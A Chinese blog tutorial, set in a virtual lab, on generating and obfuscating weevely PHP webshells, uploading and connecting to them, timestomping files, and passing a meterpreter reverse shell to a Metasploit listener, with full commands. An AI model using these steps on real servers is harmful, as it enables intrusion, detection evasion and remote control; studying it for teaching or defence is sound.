作者:小剛
一位苦於信息安全的萌新小白帽,記得關注給個贊,謝謝
本實驗僅用於信息防禦教學,切勿用於它用途
weevely
今天使用一下kali系統下的中國菜刀weevely,生成木馬文件、混淆木馬文件控制Web服務器,並進一步反彈shell給metasploit做進一步控制。
實驗環境
VM搭建的虛擬測試環境
1.phpstudy搭建主機 192.168.1.1
2.kali 192.168.1.128
weevely介紹
weevely是一款使用python編寫的webshell工具,很多說是linux下的中國菜刀,但只能用於PHP,weevely在linux上使用非常給力,但是在windows上很多模塊無法使用
weevely使用
生成shell | wevely generate <password> <文件名> |
---|---|
連接shell | weevely <URL> <password>[cmd] |
生成混淆shell | weevely generate -obfuscator <模板> <password><文件名> |
使用流程
1,使用weevely生成php木馬文件
weevely generate XG ~/shell.php
這裏看到,生成一個大小779byte大小的PHP木馬文件,密碼是XG,文件名shell.php
上面生成的是普通木馬文件,下面生成的是基於weevely模板生成的混淆木馬,起到一定的防查殺作用 (實際作用不大,照樣能被騰訊、360全家桶掃出來。)
weevely generate -h查看參數,其中 -obfuscator是用來使用混淆模板的,有兩個自帶模板,我們使用第二個生成木馬文件shell2.php
weevely generate -obfuscator cleartext1_php XG shell2.php
2,將木馬文件上傳到被攻擊web服務器
這裏的上傳過程看你要攻擊的站點了,有文件上傳漏洞,代碼執行等等,反正能把木馬文件上傳到web目錄下就行。並要知道木馬所在的文件目錄。
由於是我自己搭建的web,就直接拖拽進去了。
開啓phpstudy。
找到shell.php所在的目錄
打來shell.php發現是空白文件,這是正常現象。能打開,說明shell.php文件能正常執行.
然後複製url鏈接
3,使用weevely連接木馬文件
weevely http://192.168.1.1/shell/shell.php XG
查看ip地址,已經連接到主機192.168.1.1
同樣的方式,連接生成的混淆shell2.php
4,控制參數
連接上shell就相當於控制服務器了,可以在weevely狀態下發?來查看可以使用的命令,這裏列出ji哥常用命令。
信息蒐集:
:system_info收集系統信息
:system_info -info client_ip whoami hostname查找自己連接的ip
文件管理
:file_touch 修改文件時間
:file_touch -human-ts '2018-09-15 200:41:20' 文件名
命令執行
:shell_php 執行PHP命令
:shell_php system('dir');
5,反向shell連接msf
連接上的weevely功能雖然很強大了,但是不要忘了更強的神器metasploit,我們可以使用weevely轉發到msf進而最深度的控制服務器。
在這使用:backdoor_meterpreter參數
weevely>:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 192.168.1.128 -port 4444
:backdoor_meterpreter | 反向shell |
---|---|
-payload php/meterpreter/reverse_tcp | 是搭載的攻擊載荷 |
-lhost | 轉發給監聽的ip地址 |
-port | 就是監聽端口了 |
轉發完成,接下來就是打開msf使用監聽模塊監聽,獲取控制權
use exploit/multi/handler
show payloads
set payload php/meterpreter/reverse_tcp
set Lhost 192.168.1.128
最後run一下就可以監聽到,並進一步控制web服務器了。
總結
weevely用起來也算是菜刀的一種變形,但是搭配起msf可以說是無敵的存在。
weevely在Linux下使用很友好,但在windows下還是使用菜刀,蟻劍和冰蠍吧。
msf控制後的使用命令特別特別多,功能特別強大,說以說msf是滲透神器嘛。(提醒一下,真正進行滲透時的ip地址,要麼兩個主機在同一個內網網段,要麼在同一個公網,不然連接不上。)